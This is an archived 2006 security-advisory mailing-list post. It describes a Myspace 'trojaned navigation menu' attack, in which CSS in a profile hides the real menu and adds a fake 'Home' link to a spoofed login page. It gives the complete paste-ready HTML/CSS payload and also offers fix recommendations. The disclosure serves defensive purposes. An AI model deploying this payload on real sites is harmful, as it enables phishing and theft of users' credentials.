Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Myspace.com Trojaned Navigation Menu

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Myspace.com Trojaned Navigation Menu
Date: 21 Nov 2006 12:25:44 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Myspace.com Trojaned Navigation Menu
------------------------------------------------------------------------


SUMMARY

Myspace.com provides a site navigation menu near the top of every page. 
Users generally use this menu to navigate to the various areas of the 
website. The first link that the menu provides is called "Home" which 
navigates back to the user's personalized Myspace page which is 
essentially the user's "home base" when using the site. As such this 
particular link is used quite frequently and is used to return from other 
areas of the website, most importantly from other user's profile pages.

A content-replacement attack coupled with a spoofed Myspace login page can 
be used to collect victim users' authentication credentials. By replacing 
the navigation menu on the attacker's Myspace profile page, an 
unsuspecting victim may be redirected to an external site of the 
attacker's choice, such as a spoofed Myspace login page. Due to 
Myspace.com's seemingly random tendency to expire user sessions or log 
users out, a user being presented with the Myspace login page is not out 
of the ordinary and does not raise much suspicion on the part of the 
victim.

DETAILS

Impact:
Users are unexpectedly redirected to a website of the attacker's choice.

Users may be tricked into revealing their authentication credentials.

Technical Explanation:
The following CSS code can be submitted to a user profile's "About Me" 
section which will cause the Myspace navigation menu not to be displayed:

   <style type="text/css">
   div table td font {display: none;}
   </style>

This allows the attacker to replace it with a malicious navigation menu 
which may redirect users to an external site spoofing the Myspace login 
page.  If the user is successfully tricked into believing that they must 
re-authenticate, they will inadvertently reveal their authentication 
credentials to the attacker.

Solution & Recommendations:
Myspace should not allow users to add CSS code to their profiles via the 
update profile form.  This restriction can be accomplished by rejecting 
such submissions or stripping the code out of the form input when 
submitted.

Users should always be aware of the URL information in their browser.

As a temporary work-around, users should not use the navigation bars while 
viewing an untrusted user's Myspace profile.

Exploitation:
Place this code in the "About Me" section of the attacker's Myspace 
profile:

<style type="text/css">
div table td font {display: none;}
</style>

<div style="z-index:5; background-color:000000; position:absolute; 
top:125px; left:50%; margin-left:-395px; width:790px; height:15px;" 
align="center"><font color=><b></b></font><br>

<a href="http://www.example.com/login.html"; target=""><font 
color=ffffff>Home</font></a>
<font color=ff0099>   |</font>

<a href="http://browseusers.myspace.com/browse/browse.aspx?"; 
target=""><font color=ffffff>Browse</font></a>
<font color=ff0099>   |</font>

<a href="http://search.myspace.com/index.cfm?fuseaction=find"; 
target=""><font color=ffffff>Search</font></a>
<font color=ff0099>   |</font>

<a href="http://invite.myspace.com/index.cfm?fuseaction=invite"; 
target=""><font color=ffffff>Invite</font></a>
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=film"; target=""><font 
color=ffffff>Film</font></a>
<font color=ff0099>   |</font>

<a href="http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox"; 
target=""><font color=ffffff>Mail</font></a>
<font color=ff0099>   |</font>

<a href="http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter"; 
target=""><font color=ffffff>Blog</font></a>
<font color=ff0099>   |</font>

<a href="http://favorites.myspace.com/index.cfm?fuseaction=user.favorites"; 
target=""><font color=ffffff>Favorites</font></a>
<font color=ff0099>   |</font>

<a 
href="http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories"; 
target=""><font color=ffffff>Forum</font></a>
<font color=ff0099>   |</font>

<a href="http://groups.myspace.com/index.cfm?fuseaction=groups.categories"; 
target=""><font color=ffffff>Groups</font></a>
<font color=ff0099>   |</font>

<a href="http://events.myspace.com/index.cfm?fuseaction=events"; 
target=""><font color=ffffff>Events</font></a>
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=vids"; target=""><font 
color=ffffff>Videos</font></a>
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=music"; 
target=""><font color=ffffff>Music</font></a>
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=comedian.home"; 
target=""><font color=ffffff>Comedy</font></a>
<font color=ff0099>   |</font>

<a href="http://classifieds.myspace.com/index.cfm?fuseaction=classifieds"; 
target=""><font color=ffffff>Classifieds</font></a>
</div><style type="text/css">div div table tr td a.navbar, div div table 
tr td font {display: none;}</style>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:int3l@caughq.org> int3l.
The original article can be found at:  
<http://www.caughq.org/advisories/CAU-2006-0001.txt> 
http://www.caughq.org/advisories/CAU-2006-0001.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Myspace.com Trojaned Navigation Menu, SecuriTeam <=
Previous by Date:  [NT] MDaemon Insecure Default Directory Permissions, SecuriTeam
Next by Date:  [NT] Grandora Railto Multiple SQL Injection and Cross Site Scripting Vulnerabilities, SecuriTeam
Previous by Thread:  [NT] MDaemon Insecure Default Directory Permissions, SecuriTeam
Next by Thread:  [NT] Grandora Railto Multiple SQL Injection and Cross Site Scripting Vulnerabilities, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]